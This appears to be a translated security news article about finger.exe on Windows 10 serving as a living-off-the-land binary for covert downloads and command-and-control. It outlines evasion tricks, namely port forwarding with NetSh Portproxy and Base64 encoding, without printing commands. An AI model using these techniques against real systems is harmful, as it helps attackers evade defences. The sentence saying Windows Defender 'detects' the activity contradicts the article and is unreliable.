Another vulnerability has been reported in a Windows 10 system application that allows viruses to be downloaded without detection.
The list of built-in executables in Windows that can download and run malicious code continues to grow, according to Bleeping Computer.
These files are known as living-off-the-land binaries (LoLBins) and are part of the system. They can help attackers bypass security measures for malware without triggering security alerts.
The latest addition to the list is finger.exe, a system application for obtaining information about users of remote computers running the Finger deamon service. Communication is via the Name/Finger network protocol .
Security researcher John Page discovered that the Microsoft Windows TCPIP Finger command can also function as a file downloader and a makeshift command and control server that can be used to send commands and retrieve data from a computer.
According to the researcher, malicious commands that download files and extract data can be disguised as Finger requests so that Windows Defender detects anomalous activity.
One problem is that port 79, used by the Finger protocol, is often blocked within an organization, the post says .
However, an attacker with sufficient privileges can bypass the restriction by using the Windows NetSh Portproxy, which acts as a port forwarder for the TCP protocol.
This method will allow you to bypass firewall rules and communicate with servers through unrestricted HTTP ports. Thus, Portproxy requests are delivered to the IP address of the local computer and then forwarded to the specified host.
Using finger.exe to download files also has limitations, but the upside is that it’s hard to detect, since Base64 encoding them is enough to avoid detection.
Demo scripts available
The researcher created a demo script for verification (PoC) – DarkFinger.py for DarkFinger-Agent.bat – and published them to demonstrate this dual functionality of finger.exe.
In a video showing how the scripts work, Page compared his newly discovered method to certutil.exe, another LoLBin on Windows used for malicious purposes.
Windows Defender stopped the certutil action and logged an event while the DarkFinger script performed the action without interruption on a Windows 10 machine :
Last year ‘s Cisco Talos report listed 13 LoLBins on Windows, however, as of today, security researchers have discovered new executables that fit the bill.
One of the most recent ones that has been reported on BleepingComputer is none other than the Windows Defender antivirus built into Windows that can download arbitrary files with a DownloadFilecommand line argument added in version 4.18.2007.9 or 4.18.2009.9.
The other is desktopimgdownldr.exe, an executable file found in the Windows 10 system32 directory that is part of the Personalization CSP to change the lock screen and desktop backgrounds. We have already talked about it in detail.